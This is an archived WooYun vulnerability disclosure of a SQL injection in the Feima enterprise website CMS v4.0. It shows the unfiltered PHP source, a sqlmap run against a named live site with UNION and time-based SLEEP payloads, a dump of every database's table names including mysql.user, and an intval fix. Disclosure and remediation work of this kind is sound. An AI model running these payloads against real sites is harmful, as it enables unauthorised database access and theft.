WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2014-01-18: Vendor being contacted, awaiting vendor acknowledgement; details not disclosed.
2014-04-18: Vendor has chosen to ignore the vulnerability; details disclosed to the public.

飞马企业网站系统 v4.0 (http://www.feima123.com/, 安康飞马网络): SQL injection. Demonstration site: http://www.akzjmzx.com
Vulnerable code (tpxx.php):

<?php
$id = $_REQUEST['id'];                                  // GET and POST both accepted
include("include/conn.php");
$queryImg = "select * from hyimg_table where id=$id";   // no filtering, goes straight into the query
$resultImg = mysql_query($queryImg);                    // executed
$rowImg = mysql_fetch_array($resultImg);                // no need to read further
C:\Users\Administrator>sqlmap.py -u "http://www.akzjmzx.com/tpxx.php?id=26" --tables
Only the table list was dumped, which is enough to prove impact. Note that the listing below spans every database on the MySQL instance, including mysql.user and several other customers' site databases, so the application's database account is not restricted to its own schema.
sqlmap identified the following injection points with a total of 90 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: id=-1995 UNION ALL SELECT NULL,NULL,CONCAT(0x7162626f71,0x7554664d79484e636767,0x71626d6871),NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=26 AND SLEEP(5)
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0.11

Database: aklhw_data
[7 tables]
+----------------------------------------------+
| anli_table                                   |
| anlifenlei_table                             |
| jianjie_table                                |
| lianxi_table                                 |
| liuyan_table                                 |
| news_table                                   |
| sysadmin_table                               |
+----------------------------------------------+

Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances                               |
| events_waits_current                         |
| events_waits_history                         |
| events_waits_history_long                    |
| events_waits_summary_by_instance             |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name    |
| file_instances                               |
| file_summary_by_event_name                   |
| file_summary_by_instance                     |
| mutex_instances                              |
| performance_timers                           |
| rwlock_instances                             |
| setup_consumers                              |
| setup_instruments                            |
| setup_timers                                 |
| threads                                      |
+----------------------------------------------+

Database: wlmq107
[7 tables]
+----------------------------------------------+
| mbaojian_table                               |
| mcaidan_table                                |
| mjianjie_table                               |
| mlogo_table                                  |
| mxinxi_table                                 |
| mzhanghao_table                              |
| sysadmin_table                               |
+----------------------------------------------+

Database: wd0123
[14 tables]
+----------------------------------------------+
| hybanner_table                               |
| hyimg_table                                  |
| hyimgfenlei_table                            |
| hyjieshao_table                              |
| hyjsimg_table                                |
| hykefu_table                                 |
| hyliuyan_table                               |
| hynews_table                                 |
| hynewsfenlei_table                           |
| hyseo_table                                  |
| hytopimg_table                               |
| hyxinxi_table                                |
| hyzhanghao_table                             |
| hyzhaopin_table                              |
+----------------------------------------------+

Database: feimanet
[16 tables]
+----------------------------------------------+
| bangding_table                               |
| hybanner_table                               |
| hyimg_table                                  |
| hyimgfenlei_table                            |
| hyjieshao_table                              |
| hyjsimg_table                                |
| hykefu_table                                 |
| hyliuyan_table                               |
| hynews_table                                 |
| hynewsfenlei_table                           |
| hyseo_table                                  |
| hytopimg_table                               |
| hyxinxi_table                                |
| hyzhanghao_table                             |
| hyzhaopin_table                              |
| sysadmin_table                               |
+----------------------------------------------+

Database: feima123
[3 tables]
+----------------------------------------------+
| anli_table                                   |
| dongtai_table                                |
| sysadmin_table                               |
+----------------------------------------------+

Database: mysql
[24 tables]
+----------------------------------------------+
| user                                         |
| columns_priv                                 |
| db                                           |
| event                                        |
| func                                         |
| general_log                                  |
| help_category                                |
| help_keyword                                 |
| help_relation                                |
| help_topic                                   |
| host                                         |
| ndb_binlog_index                             |
| plugin                                       |
| proc                                         |
| procs_priv                                   |
| proxies_priv                                 |
| servers                                      |
| slow_log                                     |
| tables_priv                                  |
| time_zone                                    |
| time_zone_leap_second                        |
| time_zone_name                               |
| time_zone_transition                         |
| time_zone_transition_type                    |
+----------------------------------------------+

Database: qixiangju
[11 tables]
+----------------------------------------------+
| dflz_table                                   |
| dwgk_table                                   |
| fzjz_table                                   |
| kjfw_table                                   |
| lianxi_table                                 |
| qxyw_table                                   |
| sysadmin_table                               |
| tqyb_table                                   |
| xdh_table                                    |
| xjdt_table                                   |
| zcfg_table                                   |
+----------------------------------------------+

Database: akzjmzx
[14 tables]
+----------------------------------------------+
| hybanner_table                               |
| hyimg_table                                  |
| hyimgfenlei_table                            |
| hyjieshao_table                              |
| hyjsimg_table                                |
| hykefu_table                                 |
| hyliuyan_table                               |
| hynews_table                                 |
| hynewsfenlei_table                           |
| hyseo_table                                  |
| hytopimg_table                               |
| hyxinxi_table                                |
| hyzhanghao_table                             |
| hyzhaopin_table                              |
+----------------------------------------------+

Database: information_schema
[37 tables]
+----------------------------------------------+
| CHARACTER_SETS                               |
| COLLATIONS                                   |
| COLLATION_CHARACTER_SET_APPLICABILITY        |
| COLUMNS                                      |
| COLUMN_PRIVILEGES                            |
| ENGINES                                      |
| EVENTS                                       |
| FILES                                        |
| GLOBAL_STATUS                                |
| GLOBAL_VARIABLES                             |
| INNODB_CMP                                   |
| INNODB_CMPMEM                                |
| INNODB_CMPMEM_RESET                          |
| INNODB_CMP_RESET                             |
| INNODB_LOCKS                                 |
| INNODB_LOCK_WAITS                            |
| INNODB_TRX                                   |
| KEY_COLUMN_USAGE                             |
| PARAMETERS                                   |
| PARTITIONS                                   |
| PLUGINS                                      |
| PROCESSLIST                                  |
| PROFILING                                    |
| REFERENTIAL_CONSTRAINTS                      |
| ROUTINES                                     |
| SCHEMATA                                     |
| SCHEMA_PRIVILEGES                            |
| SESSION_STATUS                               |
| SESSION_VARIABLES                            |
| STATISTICS                                   |
| TABLES                                       |
| TABLESPACES                                  |
| TABLE_CONSTRAINTS                            |
| TABLE_PRIVILEGES                             |
| TRIGGERS                                     |
| USER_PRIVILEGES                              |
| VIEWS                                        |
+----------------------------------------------+
Suggested fix (cast the id to an integer before it reaches the query):

<?php
$id = $_REQUEST['id'];                                  // GET and POST both accepted
// add the following line
$id = intval($id);
// end of added line
include("include/conn.php");
$queryImg = "select * from hyimg_table where id=$id";   // no filtering, goes straight into the query
$resultImg = mysql_query($queryImg);                    // executed
$rowImg = mysql_fetch_array($resultImg);                // no need to read further
Vendor could not be reached, or the vendor actively refused to respond.